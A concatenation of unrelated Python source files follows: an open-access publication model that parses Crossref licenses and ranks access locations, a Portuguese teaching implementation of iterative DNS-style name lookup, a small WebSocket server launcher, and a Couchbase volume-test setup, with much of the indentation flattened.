if self.is_same_publisher('Institute of Electrical and Electronics Engineers (IEEE)'):
# policy says 2 years after publication but license date is date of publication
return datetime.timedelta(days=365*2)
else:
return datetime.timedelta()
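    # For example (hypothetical dates): an IEEE author-manuscript license whose
    # Crossref start date is 2020-01-15 gets the two-year delay added in
    # open_manuscript_licenses, so its computed availability date lands in
    # early 2022 rather than on the nominal license start date.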
@property
def crossref_licenses(self):
unspecified_version_publishers = [
'Informa UK Limited',
'Geological Society of London',
]
allow_unspecified = any([self.is_same_publisher(p) for p in unspecified_version_publishers])
tdm_publishers = ['Uniwersytet Jagiellonski - Wydawnictwo Uniwersytetu Jagiellonskiego']
allow_tdm = any([self.is_same_publisher(p) for p in tdm_publishers])
try:
license_dicts = self.crossref_api_modified["license"]
license_urls = []
for license_dict in license_dicts:
license_date = None
if license_version := license_dict.get("content-version", None):
if (
license_version == "vor"
or (allow_unspecified and license_version == "unspecified")
or (allow_tdm and license_version == "tdm")
):
if license_dict.get("start", None):
if license_dict["start"].get("date-time", None):
license_date = license_dict["start"].get("date-time", None)
try:
license_date = license_date and dateutil.parser.parse(license_date).date()
except Exception:
license_date = None
license_urls.append({'url': license_dict["URL"], 'date': license_date})
return sorted(license_urls, key=lambda license: license['date'])
except (KeyError, TypeError):
return []
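    # Sketch of the Crossref "license" entries parsed above (field names from
    # the public Crossref REST API; the values are illustrative):
    #   {"URL": "http://creativecommons.org/licenses/by/4.0/",
    #    "content-version": "vor",
    #    "start": {"date-time": "2021-03-01T00:00:00Z"}}
    # would be returned as
    #   [{'url': 'http://creativecommons.org/licenses/by/4.0/',
    #     'date': datetime.date(2021, 3, 1)}]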
@property
def is_subscription_journal(self):
if (
oa_local.is_open_via_doaj(self.issns, self.all_journals, self.year)
or oa_local.is_open_via_doi_fragment(self.doi)
or oa_local.is_open_via_publisher(self.publisher)
or self.is_open_journal_via_observed_oa_rate()
or oa_local.is_open_via_manual_journal_setting(self.issns, self.year)
or oa_local.is_open_via_url_fragment(self.url)
):
return False
return True
@property
def doi_resolver(self):
if not self.doi:
return None
if oa_local.is_open_via_datacite_prefix(self.doi):
return "datacite"
if self.crossref_api_modified and "error" not in self.crossref_api_modified:
return "crossref"
return None
@property
def is_free_to_read(self):
return bool(self.fulltext_url)
@property
def is_boai_license(self):
boai_licenses = ["cc-by", "cc0", "pd"]
if self.license and (self.license in boai_licenses):
return True
return False
@property
def authors(self):
try:
return self.crossref_api_modified["all_authors"]
except (AttributeError, TypeError, KeyError):
return None
@property
def first_author_lastname(self):
try:
return self.crossref_api_modified["first_author_lastname"]
except (AttributeError, TypeError, KeyError):
return None
@property
def last_author_lastname(self):
try:
last_author = self.authors[-1]
return last_author["family"]
except (AttributeError, TypeError, KeyError):
return None
@property
def display_issns(self):
if self.issns:
return ",".join(self.issns)
return None
@property
    def issns(self):
        issns = []
        try:
            issns = self.crossref_api_modified["issn"]
        except (AttributeError, TypeError, KeyError):
            if self.tdm_api:
                issns = re.findall("<issn media_type=.*>(.*)</issn>", self.tdm_api)
        if not issns:
            return None
        return issns
@property
def best_title(self):
if hasattr(self, "title") and self.title:
return re.sub("\s+", " ", self.title)
return self.crossref_title
@property
def crossref_title(self):
try:
return re.sub("\s+", " ", self.crossref_api_modified["title"])
except (AttributeError, TypeError, KeyError, IndexError):
return None
@property
def year(self):
try:
return self.crossref_api_modified["year"]
except (AttributeError, TypeError, KeyError, IndexError):
return None
@property
def journal(self):
try:
return re.sub("\s+", " ", self.crossref_api_modified["journal"])
except (AttributeError, TypeError, KeyError, IndexError):
return None
@property
def all_journals(self):
try:
return self.crossref_api_modified["all_journals"]
except (AttributeError, TypeError, KeyError, IndexError):
return None
@property
def genre(self):
try:
return re.sub("\s+", " ", self.crossref_api_modified["type"])
except (AttributeError, TypeError, KeyError):
return None
@property
def abstract_from_crossref(self):
try:
return self.crossref_api_raw_new["abstract"]
except (AttributeError, TypeError, KeyError):
return None
@property
def deduped_sorted_locations(self):
locations = []
sorted_locations = self.sorted_locations
# transfer PDF URLs from bronze location to hybrid location
# then best_url is the same, and they aren't duplicated
# be very conservative - only merge if exactly one location with pdf and one without,
# and both are published versions hosted by the publisher
publisher_no_pdf = [
loc for loc in sorted_locations
if loc.host_type == "publisher" and loc.version == "publishedVersion" and not loc.pdf_url
]
publisher_pdf = [
loc for loc in sorted_locations
if loc.host_type == "publisher" and loc.version == "publishedVersion" and loc.pdf_url
]
if len(publisher_no_pdf) == 1 and len(publisher_pdf) == 1:
if publisher_no_pdf[0].metadata_url == publisher_pdf[0].metadata_url:
publisher_no_pdf[0].pdf_url = publisher_pdf[0].pdf_url
for next_location in sorted_locations:
urls_so_far = [location.best_url for location in locations]
if next_location.best_url not in urls_so_far:
locations.append(next_location)
return locations
@property
def filtered_locations(self):
locations = self.open_locations
# now remove noncompliant ones
compliant_locations = [location for location in locations if not location.is_reported_noncompliant]
validate_pdf_urls(compliant_locations)
valid_locations = [
x for x in compliant_locations
if x.pdf_url_valid
and not (self.has_bad_doi_url and x.best_url == self.url)
and x.endpoint_id != '01b84da34b861aa938d' # lots of abstracts presented as full text. find a better way to do this.
and x.endpoint_id != '58e562cef9eb07c3c1d' # garbage PDFs in identifier tags
]
for location in valid_locations:
if location.pdf_url:
location.pdf_url = fix_url_scheme(location.pdf_url)
if location.metadata_url:
location.metadata_url = fix_url_scheme(location.metadata_url)
return valid_locations
@property
def sorted_locations(self):
locations = self.filtered_locations
# first sort by best_url so ties are handled consistently
locations = sorted(locations, key=lambda x: x.best_url, reverse=False)
# now sort by what's actually better
locations = sorted(locations, key=lambda x: x.sort_score, reverse=False)
return locations
@property
def data_standard(self):
if self.scrape_updated and not self.error:
return 2
else:
return 1
def lookup_issn_l(self):
for issn in self.issns or []:
# use the first issn that matches an issn_l
# can't really do anything if they would match different issn_ls
lookup = db.session.query(IssnlLookup).get(issn)
if lookup:
return lookup
return None
def lookup_journal(self):
return self.issn_l and db.session.query(Journal).options(
orm.defer('api_raw_crossref'), orm.defer('api_raw_issn')
).get({'issn_l': self.issn_l})
def get_resolved_url(self):
if hasattr(self, "my_resolved_url_cached"):
return self.my_resolved_url_cached
try:
r = requests.get("http://doi.org/{}".format(self.id),
stream=True,
allow_redirects=True,
timeout=(3,3),
verify=False
)
self.my_resolved_url_cached = r.url
except Exception: #hardly ever do this, but man it seems worth it right here
logger.exception("get_resolved_url failed")
self.my_resolved_url_cached = None
return self.my_resolved_url_cached
def __repr__(self):
if self.id:
my_string = self.id
else:
my_string = self.best_title
return "<Pub ( {} )>".format(my_string)
@property
def reported_noncompliant_copies(self):
return reported_noncompliant_url_fragments(self.doi)
def is_same_publisher(self, publisher):
if self.publisher:
return normalize(self.publisher) == normalize(publisher)
return False
@property
def best_url(self):
if not self.best_oa_location:
return None
return self.best_oa_location.best_url
@property
def best_url_is_pdf(self):
if not self.best_oa_location:
return None
return self.best_oa_location.best_url_is_pdf
@property
def best_evidence(self):
if not self.best_oa_location:
return None
return self.best_oa_location.display_evidence
@property
def best_host(self):
if not self.best_oa_location:
return None
return self.best_oa_location.host_type
@property
def best_repo_id(self):
if self.best_host != 'repository':
return None
return self.best_oa_location.endpoint_id
@property
def best_license(self):
if not self.best_oa_location:
return None
return self.best_oa_location.license
@property
def best_version(self):
if not self.best_oa_location:
return None
return self.best_oa_location.version
@property
def best_oa_location_dict(self):
best_location = self.best_oa_location
if best_location:
return best_location.to_dict_v2()
return None
@property
def best_oa_location(self):
all_locations = [location for location in self.all_oa_locations]
if all_locations:
return all_locations[0]
return None
@property
def first_oa_location_dict(self):
first_location = self.first_oa_location
if first_location:
return first_location.to_dict_v2()
return None
@property
def first_oa_location(self):
all_locations = [location for location in self.all_oa_locations]
if all_locations:
return sorted(all_locations, key=lambda loc: (loc.oa_date or datetime.date.max, loc.sort_score))[0]
return None
@property
def all_oa_locations(self):
all_locations = [location for location in self.deduped_sorted_locations]
if all_locations:
for location in all_locations:
location.is_best = False
all_locations[0].is_best = True
return all_locations
def all_oa_location_dicts(self):
return [location.to_dict_v2() for location in self.all_oa_locations]
def embargoed_oa_location_dicts(self):
return [location.to_dict_v2() for location in self.embargoed_locations]
def to_dict_v1(self):
response = {
"algorithm_version": self.data_standard,
"doi_resolver": self.doi_resolver,
"evidence": self.evidence,
"free_fulltext_url": self.fulltext_url,
"is_boai_license": self.is_boai_license,
"is_free_to_read": self.is_free_to_read,
"is_subscription_journal": self.is_subscription_journal,
"license": self.license,
"oa_color": self.oa_status and self.oa_status.value,
"reported_noncompliant_copies": self.reported_noncompliant_copies
}
for k in ["doi", "title", "url"]:
value = getattr(self, k, None)
if value:
response[k] = value
if self.error:
response["error"] = self.error
return response
@property
def best_location(self):
if not self.deduped_sorted_locations:
return None
return self.deduped_sorted_locations[0]
@property
def is_archived_somewhere(self):
if self.is_oa:
return any([location.oa_status is OAStatus.green for location in self.deduped_sorted_locations])
return None
@property
def oa_is_doaj_journal(self):
if self.is_oa:
if oa_local.is_open_via_doaj(self.issns, self.all_journals, self.year):
return True
else:
return False
return False
@property
def oa_is_open_journal(self):
if self.is_oa:
if self.oa_is_doaj_journal:
return True
if oa_local.is_open_via_publisher(self.publisher):
return True
if oa_local.is_open_via_manual_journal_setting(self.issns, self.year):
return True
if self.is_open_journal_via_observed_oa_rate():
return True
if oa_local.is_open_via_publisher_genre(self.publisher, self.genre):
return True
if oa_local.is_open_via_journal_doi_prefix(self.doi):
return True
return False
@property
def display_updated(self):
if self.updated:
return self.updated.isoformat()
return None
@property
def has_abstract(self):
if self.abstracts:
return True
return False
@property
def display_abstracts(self):
return []
@property
def predicted_bronze_embargo_end(self):
published = self.issued or self.deposited or datetime.date(1970, 1, 1)
journal = self.lookup_journal()
if journal and journal.embargo and journal.embargo + published > datetime.date.today():
return journal.embargo + published
return None
@property
def refresh_priority(self):
published = self.issued or self.deposited or datetime.date(1970, 1, 1)
today = datetime.date.today()
journal = self.lookup_journal()
if published > datetime.date.today():
# refresh things that aren't published yet infrequently
refresh_interval = datetime.timedelta(days=365)
elif self.oa_status is OAStatus.bronze and self.scrape_pdf_url is None:
# refresh bronze articles without PDFs often since PDF check won't catch them if they change
refresh_interval = datetime.timedelta(days=30)
else:
if self.oa_status in [OAStatus.closed, OAStatus.green]:
# look for delayed-OA articles after common embargo periods by adjusting the published date
if journal and journal.embargo and journal.embargo + published < today:
# article is past known embargo period
if not self.scrape_metadata_url:
published += journal.embargo
elif journal and journal.delayed_oa and not self.scrape_metadata_url:
# treat every 6th mensiversary for the first 4 years like the publication date
six_months = relativedelta(months=6)
shifts = 0
while shifts < 8 and published < today - six_months:
published += six_months
shifts += 1
age = today - published
# arbitrary scale factor, refresh newer things more often
refresh_interval = age / 6
if self.genre == 'component':
refresh_interval *= 2
refresh_interval = clamp(refresh_interval, datetime.timedelta(days=2), datetime.timedelta(days=365))
last_refresh = self.scrape_updated or datetime.datetime(1970, 1, 1)
since_last_refresh = datetime.datetime.utcnow() - last_refresh
priority = (since_last_refresh - refresh_interval).total_seconds() / refresh_interval.total_seconds()
return priority
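    # Worked example with made-up numbers: an ordinary article published 600
    # days ago gets refresh_interval = 600 / 6 = 100 days (inside the 2..365
    # day clamp). If it was last scraped 250 days ago, its priority is
    # (250 - 100) / 100 = 1.5; larger values mark records as more overdue.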
@property
def has_bad_doi_url(self):
return (
(self.issns and (
# links don't resolve
'1507-1367' in self.issns or
# links don't resolve
'0718-1876' in self.issns or
# links don't resolve
'2237-0722' in self.issns
)) or
# pdf abstracts
self.id.startswith('10.5004/dwt.') or
self.id == '10.2478/cirr-2019-0007'
)
def is_open_journal_via_observed_oa_rate(self):
lookup = self.issn_l and db.session.query(JournalOaStartYear).get({'issn_l': self.issn_l})
return lookup and self.issued and self.issued.year >= lookup.oa_year
def store_refresh_priority(self):
stmt = sql.text(
'update pub_refresh_queue set priority = :priority where id = :id'
).bindparams(priority=self.refresh_priority, id=self.id)
db.session.execute(stmt)
def store_preprint_relationships(self):
preprint_relationships = []
if self.crossref_api_raw_new and self.crossref_api_raw_new.get('relation', None):
postprints = self.crossref_api_raw_new['relation'].get('is-preprint-of', [])
postprint_dois = [p.get('id', None) for p in postprints if p.get('id-type', None) == 'doi']
for postprint_doi in postprint_dois:
try:
normalized_postprint_doi = normalize_doi(postprint_doi)
preprint_relationships.append({'preprint_id': self.doi, 'postprint_id': normalized_postprint_doi})
except Exception:
pass
preprints = self.crossref_api_raw_new['relation'].get('has-preprint', [])
preprint_dois = [p.get('id', None) for p in preprints if p.get('id-type', None) == 'doi']
for preprint_doi in preprint_dois:
try:
normalized_preprint_doi = normalize_doi(preprint_doi)
preprint_relationships.append({'preprint_id': normalized_preprint_doi, 'postprint_id': self.doi})
except Exception:
pass
for preprint_relationship in preprint_relationships:
db.session.merge(Preprint(**preprint_relationship))
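    # The Crossref "relation" object this reads looks roughly like
    #   {"is-preprint-of": [{"id": "10.xxxx/xxxxx", "id-type": "doi"}]}
    # (shape from the public Crossref REST API; the DOI here is a placeholder).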
def store_retractions(self):
retracted_dois = set()
if self.crossref_api_raw_new:
for update_to in self.crossref_api_raw_new.get('update-to', []):
if update_to.get('type') == 'retraction':
if retracted_doi := normalize_doi(update_to.get('DOI'), return_none_if_error=True):
retracted_dois.add(retracted_doi)
db.session.query(Retraction).filter(
Retraction.retraction_doi == self.doi,
Retraction.retracted_doi.notin_(list(retracted_dois))
).delete()
for retracted_doi in retracted_dois:
db.session.merge(Retraction(retraction_doi=self.doi, retracted_doi=retracted_doi))
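    # Retractions arrive as Crossref "update-to" entries, e.g.
    #   {"DOI": "10.xxxx/xxxxx", "type": "retraction", "label": "Retraction"}
    # (field names from the public Crossref REST API; the DOI is a placeholder).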
def store_pdf_urls_for_validation(self):
urls = {loc.pdf_url for loc in self.open_locations if loc.pdf_url and not is_pmc(loc.pdf_url)}
for url in urls:
db.session.merge(
PdfUrl(url=url, publisher=self.publisher)
)
def mint_pages(self):
for p in oa_page.make_oa_pages(self):
db.session.merge(p)
@staticmethod
def dict_v2_fields():
return OrderedDict([
("doi", lambda p: p.doi),
("doi_url", lambda p: p.url),
("title", lambda p: p.best_title),
("genre", lambda p: p.genre),
("is_paratext", lambda p: p.is_paratext),
("published_date", lambda p: p.issued and p.issued.isoformat()),
("year", lambda p: p.year),
("journal_name", lambda p: p.journal),
("journal_issns", lambda p: p.display_issns),
("journal_issn_l", lambda p: p.issn_l),
("journal_is_oa", lambda p: p.oa_is_open_journal),
("journal_is_in_doaj", lambda p: p.oa_is_doaj_journal),
("publisher", lambda p: p.publisher),
("is_oa", lambda p: p.is_oa),
("oa_status", lambda p: p.oa_status and p.oa_status.value),
("has_repository_copy", lambda p: p.has_green),
("best_oa_location", lambda p: p.best_oa_location_dict),
("first_oa_location", lambda p: p.first_oa_location_dict),
("oa_locations", lambda p: p.all_oa_location_dicts()),
("oa_locations_embargoed", lambda p: p.embargoed_oa_location_dicts()),
("updated", lambda p: p.display_updated),
("data_standard", lambda p: p.data_standard),
("z_authors", lambda p: p.authors),
])
def to_dict_v2(self):
response = OrderedDict([(key, func(self)) for key, func in Pub.dict_v2_fields().items()])
return response
def to_dict_search(self):
response = self.to_dict_v2()
response["abstracts"] = self.display_abstracts
del response["z_authors"]
if self.authors:
response["author_lastnames"] = [author.get("family", None) for author in self.authors]
else:
response["author_lastnames"] = []
if not hasattr(self, "score"):
self.score = None
response["score"] = self.score
if not hasattr(self, "snippet"):
self.snippet = None
response["snippet"] = self.snippet
return response
# db.create_all()
# commit_success = safe_commit(db)
# if not commit_success:
# logger.info(u"COMMIT fail making objects")
|
dns.py
|
#!/usr/bin/env python3
# coding=utf-8
"""
Implementação de um sistema de nomeação similar ao DNS
Cada objeto NameServer representaria um servidor de nomes real.
Implementação do lookup iterativo.
"""
import json
import logging
import socket
import threading
from typing import Optional, Tuple
class NameServer(object):
"""
Descreve um domínio, que pode conter subdomínios.
Argumentos:
name -- Nome do servidor.
level -- Valor que representa o nível hierárquico desse servidor.
A raiz tem level 1, os filhos do servidor raiz tem level 2, os filhos
dos filhos level 3, e assim por diante.
host -- Endereço IP do servidor.
port -- Porta do servidor.
"""
def __init__(self, name: str, level: int, host: str, port: int):
super(NameServer, self).__init__()
self.name = name
self.daemon = True
self.address = '{}:{}'.format(host, port)
self._level = level
self._host = host
self._port = port
        self._lut = {}  # lookup table for the DNS records
def add_record(self, domain: str, address: str):
"""Adiciona um novo registro de subdomínio a este domínio.
Os registros são compostos de um nome de domínio, que é a chave
para a lookup table (lut) e um endereço no formato 'IP:PORT'.
"""
self._lut[domain] = address
    def name_lookup(self, lookupname: str) -> Tuple[bool, Optional[str], Optional[str]]:
        """Look up the requested name.
        Given lookupname, check whether the requested name's address is in
        the lookup table. If the address is not found there, determine
        which name server can answer for the requested name and return
        that server's address instead. If no name server that answers for
        the domain is found, report that the name was not found. The
        return value is a triple: the first field is a flag indicating
        whether a matching record was found, the second is the domain
        name, and the third is the address corresponding to that domain.
        """
try:
address = self._lut[lookupname]
return (True, lookupname, address)
except KeyError:
pass
splitted = lookupname.split('.')
domain = '.'.join(splitted[-self._level:])
try:
address = self._lut[domain]
return (True, domain, address)
except KeyError:
return (False, None, None)
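    # Example (hypothetical records): on a level-1 server whose table holds
    # {'com': '127.0.0.1:10001'}, name_lookup('example.com') returns
    # (True, 'com', '127.0.0.1:10001'), a referral to the 'com' server,
    # while name_lookup('example.org') returns (False, None, None).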
def handler(self, conn):
"""Trata uma requisição do cliente.
Quando um resolvedor conecta no servidor, uma nova Thread é
criada para gerenciar a conexão estabelecida, e tratar a
as requisições de resolução de nomes.
"""
lookupname = conn.recv(1024)
lookupname = lookupname.decode('utf-8')
found, nsname, addr = self.name_lookup(lookupname)
response_content = {
'found': found,
'nsname': nsname,
'addr': addr
}
response = json.dumps(response_content)
        conn.sendall(response.encode('utf-8'))
        conn.close()
def run(self):
"""Executa o servidor
Função principal do servidor, mantém o servidor ativo aguardando
conexões ou para quando ocorre uma interrupção de teclado.
"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.bind((self._host, self._port))
            sock.listen(4)  # queue up to 4 pending connections
logging.info("Listening on '%s'", self.address)
try:
while True:
(conn, addrinfo) = sock.accept()
logging.info("Connected by '%s'", addrinfo)
threading.Thread(target=self.handler, args=(conn,)).start()
except KeyboardInterrupt:
pass
class ResolverIter(object):
"""Resolvedor de nomes pelo método iterativo."""
def __init__(self):
super(ResolverIter, self).__init__()
self._cache = {
'.': '127.0.0.1:10000'
}
def name_lookup(self, lookupname: str) -> str:
"""Resolve um nome e retorna um objeto JSON com sua resolução."""
def dolookup(address):
"""Solicita uma resolução com o servidor de nomes no endereço
address no formato ip:porta.
Retorna o valor respondido pela conexão."""
(host, port) = address.split(':')
port = int(port)
with socket.create_connection((host, port)) as conn:
conn.sendall(lookupname.encode('utf-8'))
response = conn.recv(1024)
response = response.decode('utf-8')
logging.info('Response: %s', response)
response_content = json.loads(response)
return response_content
logging.info("Resolvendo '%s'", lookupname)
try:
# Procura primeiramente na cache e se encontrar retorna.
address = self._cache[lookupname]
logging.info("Endereço encontrado em cache '%s'", address)
return address
except KeyError:
pass
# inicia a resolução pelo servidor de nomes raiz
rootaddr = self._cache['.']
response_content = dolookup(rootaddr)
if not response_content['found']:
# Nome não encontrado retorna erro!
logging.info("Endereço não encontrado!")
return 'Não encontrado!'
# verifica se endereço encontrado é o requerido
while response_content['nsname'] != lookupname:
# se não for procura iterativamente pela árvore de servidores.
response_content = dolookup(response_content['addr'])
if not response_content['found']:
logging.info("Endereço não encontrado!")
return 'Não encontrado!'
logging.info("Endereço encontrado '%s'", response_content['addr'])
# Atualiza endereço na cache
self._cache[response_content['nsname']] = response_content['addr']
# Retorna o endereço encontrado
return response_content['addr']
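# Minimal wiring sketch (an illustration, not part of the original assignment):
# run a root server and a 'com' server in background threads, then resolve a
# name iteratively. The addresses and registered records below are made up.
if __name__ == '__main__':
    import time
    logging.basicConfig(level=logging.INFO)
    root = NameServer('.', 1, '127.0.0.1', 10000)
    root.add_record('com', '127.0.0.1:10001')
    com = NameServer('com', 2, '127.0.0.1', 10001)
    com.add_record('example.com', '93.184.216.34:80')
    threading.Thread(target=root.run, daemon=True).start()
    threading.Thread(target=com.run, daemon=True).start()
    time.sleep(0.5)  # give both servers a moment to start listening
    resolver = ResolverIter()
    print(resolver.name_lookup('example.com'))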
|
SimpleSocket.py
|
from typing import Any, Union
import threading
# Assumes the dpallot SimpleWebSocketServer package, which exposes the
# SimpleWebSocketServer and WebSocket classes.
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
import cv2
import math
clients = []
server = None
class RunSocket():
    def __init__(self):
        pass
    def RUN(self):
        class SimpleWSServer(WebSocket):
            def handleConnected(self):
                clients.append(self)
            def handleClose(self):
                clients.remove(self)
        def run_server():
            global server
            # SimpleWebSocketServer takes (host, port, websocketclass, selectInterval);
            # an empty host string binds to all interfaces.
            server = SimpleWebSocketServer('', 9000, SimpleWSServer,
                                           selectInterval=(1000.0 / 15) / 1000)
            server.serveforever()
        t = threading.Thread(target=run_server)
        t.start()
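# Hypothetical usage sketch (not part of the original file): after RUN() has
# started the server thread, frames or status messages can be pushed to every
# connected browser via the WebSocket.sendMessage API of SimpleWebSocketServer.
#   sock = RunSocket()
#   sock.RUN()
#   for client in clients:
#       client.sendMessage(u'frame-ready')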
|
Magma.py
|
'''
Created on Mar 29, 2020
@author: riteshagarwal
'''
import random
from BucketLib.BucketOperations import BucketHelper
from BucketLib.bucket import Bucket
from TestInput import TestInputSingleton
from basetestcase import BaseTestCase
from couchbase_helper.documentgenerator import doc_generator
from error_simulation.cb_error import CouchbaseError
from membase.api.rest_client import RestConnection, RestHelper
from remote.remote_util import RemoteMachineShellConnection
from sdk_exceptions import SDKException
from table_view import TableView
from Cb_constants.CBServer import CbServer
import os
from memcached.helper.data_helper import MemcachedClientHelper
from cb_tools.cbstats import Cbstats
import threading
import time
from custom_exceptions.exception import RebalanceFailedException
import math
import subprocess
from math import ceil
from Jython_tasks.task_manager import TaskManager as local_tm
import copy
from com.couchbase.test.taskmanager import TaskManager
from com.couchbase.test.sdk import Server, SDKClient
from com.couchbase.test.sdk import SDKClient as NewSDKClient
from com.couchbase.test.docgen import WorkLoadSettings,\
DocumentGenerator
from com.couchbase.test.loadgen import WorkLoadGenerate
from com.couchbase.test.docgen import DocRange
from java.util import HashMap
from couchbase.test.docgen import DRConstants
from com.couchbase.test.key import SimpleKey
from com.couchbase.client.core.error import DocumentExistsException,\
TimeoutException, DocumentNotFoundException, ServerOutOfMemoryException
class volume(BaseTestCase):
def init_doc_params(self):
self.create_perc = 100
self.update_perc = self.input.param("update_perc", 50)
self.delete_perc = self.input.param("delete_perc", 50)
self.expiry_perc = self.input.param("expiry_perc", 0)
self.read_perc = self.input.param("read_perc", 100)
self.start = 0
self.end = 0
self.initial_items = self.start
self.final_items = self.end
self.create_end = 0
self.create_start = 0
self.read_start = 0
self.read_end = 0
self.update_end = 0
self.update_start = 0
self.delete_end = 0
self.delete_start = 0
self.expire_end = 0
self.expire_start = 0
def setUp(self):
BaseTestCase.setUp(self)
self.init_doc_params()
self.num_collections = self.input.param("num_collections", 1)
self.num_scopes = self.input.param("num_scopes", 1)
self.num_buckets = self.input.param("num_buckets", 1)
self.doc_ops = self.input.param("doc_ops", "create")
self.mutation_perc = 100
if self.doc_ops:
self.doc_ops = self.doc_ops.split(':')
self.max_tasks_per_collection = 8
process_concurrency = int(math.ceil(self.max_tasks_per_collection /
float(len(self.doc_ops))))
process_concurrency = self.input.param("pc", process_concurrency)
doc_tasks = (self.num_buckets*self.num_scopes*self.num_collections) * len(self.doc_ops) * process_concurrency + 2
self.thread_to_use = min(64, doc_tasks)
self.input.test_params.update({"threads_to_use":
self.thread_to_use})
self.log.critical("Total Doc-Tasks workers = %s" % self.thread_to_use)
self.log.critical("Total Doc-Tasks = %s" % doc_tasks)
self.doc_loading_tm = local_tm(number_of_threads=self.thread_to_use)
self.process_concurrency = self.input.param("pc", process_concurrency)
self.rest = RestConnection(self.servers[0])
self.op_type = self.input.param("op_type", "create")
self.dgm = self.input.param("dgm", None)
self.available_servers = self.cluster.servers[self.nodes_init:]
self.num_buckets = self.input.param("num_buckets", 1)
self.mutate = 0
self.iterations = self.input.param("iterations", 2)
self.step_iterations = self.input.param("step_iterations", 1)
self.rollback = self.input.param("rollback", True)
self.vbucket_check = self.input.param("vbucket_check", True)
self.new_num_writer_threads = self.input.param(
"new_num_writer_threads", 6)
self.new_num_reader_threads = self.input.param(
"new_num_reader_threads", 8)
self.end_step = self.input.param("end_step", None)
self.key_prefix = "Users"
self.crashes = self.input.param("crashes", 20)
self.check_dump_thread = True
self.skip_read_on_error = False
self.suppress_error_table = False
self.track_failures = True
self.loader_dict = None
self.parallel_reads = self.input.param("parallel_reads", False)
self._data_validation = self.input.param("data_validation", True)
self.disable_magma_commit_points = self.input.param(
"disable_magma_commit_points", False)
self.fragmentation = int(self.input.param("fragmentation", 50))
self.cursor_dropping_checkpoint = self.input.param(
"cursor_dropping_checkpoint", None)
self.assert_crashes_on_load = self.input.param("assert_crashes_on_load",
True)
#######################################################################
self.PrintStep("Step 1: Create a %s node cluster" % self.nodes_init)
if self.nodes_init > 1:
nodes_init = self.cluster.servers[1:self.nodes_init]
self.task.rebalance([self.cluster.master], nodes_init, [])
self.cluster.nodes_in_cluster.extend(
[self.cluster.master] + nodes_init)
else:
self.cluster.nodes_in_cluster.extend([self.cluster.master])
self.cluster_util.set_metadata_purge_interval(self.cluster.master)
#######################################################################
self.PrintStep("Step 2: Create required buckets and collections.")
self.create_required_buckets()
props = "magma"
update_bucket_props = False
if self.disable_magma_commit_points:
props += ";magma_max_commit_points=0"
update_bucket_props = True
if self.cursor_dropping_checkpoint:
props += ";cursor_dropping_checkpoint_mem_upper_mark=%s" %\
str(self.cursor_dropping_checkpoint)
update_bucket_props = True
if update_bucket_props:
self.bucket_util.update_bucket_props(
"backend", props,
self.cluster, self.cluster.buckets)
self.sleep(10, "Sleep for 10 seconds so that collections \
can be created")
else:
for node in self.servers:
shell = RemoteMachineShellConnection(node)
shell.enable_diag_eval_on_non_local_hosts()
shell.disconnect()
self.scope_name = self.input.param("scope_name",
CbServer.default_scope)
if self.scope_name != CbServer.default_scope:
self.bucket_util.create_scope(self.cluster.master,
self.bucket,
{"name": self.scope_name})
if self.num_scopes > 1:
self.scope_prefix = self.input.param("scope_prefix",
"VolumeScope")
for bucket in self.cluster.buckets:
for i in range(self.num_scopes):
scope_name = self.scope_prefix + str(i)
self.log.info("Creating scope: %s"
% (scope_name))
self.bucket_util.create_scope(self.cluster.master,
bucket,
{"name": scope_name})
self.sleep(0.5)
self.num_scopes += 1
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
if self.num_collections >= 1:
self.collection_prefix = self.input.param("collection_prefix",
"VolumeCollection")
for i in range(self.num_collections):
collection_name = self.collection_prefix + str(i)
self.bucket_util.create_collection(self.cluster.master,
bucket,
scope,
{"name": collection_name})
self.sleep(0.5)
# self.num_collections += 1
self.rest = RestConnection(self.cluster.master)
self.assertTrue(self.rest.update_autofailover_settings(False, 600),
"AutoFailover disabling failed")
if self.sdk_client_pool:
max_clients = min(self.task_manager.number_of_threads,
20)
clients_per_bucket = int(ceil(max_clients / self.num_buckets))
for bucket in self.cluster.buckets:
self.sdk_client_pool.create_clients(
bucket,
[self.cluster.master],
clients_per_bucket,
compression_settings=self.sdk_compression)
self.retry_exceptions = None
self.ignore_exceptions = None
self.key_type = self.input.param("key_type", "SimpleKey")
self.ops_rate = self.input.param("ops_rate", 10000)
def tearDown(self):
self.check_dump_thread = False
self.stop_crash = True
BaseTestCase.tearDown(self)
def get_memory_footprint(self):
        # `ps v` prints a header row first; locate the RSS column and convert KiB to MiB
        out = subprocess.Popen(['ps', 'v', '-p', str(os.getpid())],
                               stdout=subprocess.PIPE).communicate()[0].split(b'\n')
        rss_index = out[0].split().index(b'RSS')
        mem = float(out[1].split()[rss_index]) / 1024
self.PrintStep("RAM FootPrint: %s" % str(mem))
return mem
def create_required_buckets(self):
self.log.info("Get the available memory quota")
self.info = self.rest.get_nodes_self()
# threshold_memory_vagrant = 100
kv_memory = self.info.memoryQuota - 100
# Creating buckets for data loading purpose
self.log.info("Create CB buckets")
self.bucket_expiry = self.input.param("bucket_expiry", 0)
ramQuota = self.input.param("ramQuota", kv_memory)
buckets = ["GleamBookUsers"]*self.num_buckets
self.bucket_type = self.bucket_type.split(';')*self.num_buckets
self.compression_mode = self.compression_mode.split(';')*self.num_buckets
self.bucket_eviction_policy = self.bucket_eviction_policy
for i in range(self.num_buckets):
bucket = Bucket(
{Bucket.name: buckets[i] + str(i),
Bucket.ramQuotaMB: ramQuota/self.num_buckets,
Bucket.maxTTL: self.bucket_expiry,
Bucket.replicaNumber: self.num_replicas,
Bucket.storageBackend: self.bucket_storage,
Bucket.evictionPolicy: self.bucket_eviction_policy,
Bucket.bucketType: self.bucket_type[i],
Bucket.flushEnabled: Bucket.FlushBucket.ENABLED,
Bucket.compressionMode: self.compression_mode[i],
Bucket.fragmentationPercentage: self.fragmentation})
self.bucket_util.create_bucket(self.cluster, bucket)
# rebalance the new buckets across all nodes.
self.log.info("Rebalance Starts")
self.nodes = self.rest.node_statuses()
self.rest.rebalance(otpNodes=[node.id for node in self.nodes],
ejectedNodes=[])
self.rest.monitorRebalance()
def set_num_writer_and_reader_threads(self, num_writer_threads="default",
num_reader_threads="default"):
for node in self.cluster_util.get_kv_nodes(self.cluster):
bucket_helper = BucketHelper(node)
bucket_helper.update_memcached_settings(
num_writer_threads=num_writer_threads,
num_reader_threads=num_reader_threads,
num_storage_threads="default")
def generate_docs(self, doc_ops=None,
create_end=None, create_start=None,
update_end=None, update_start=None,
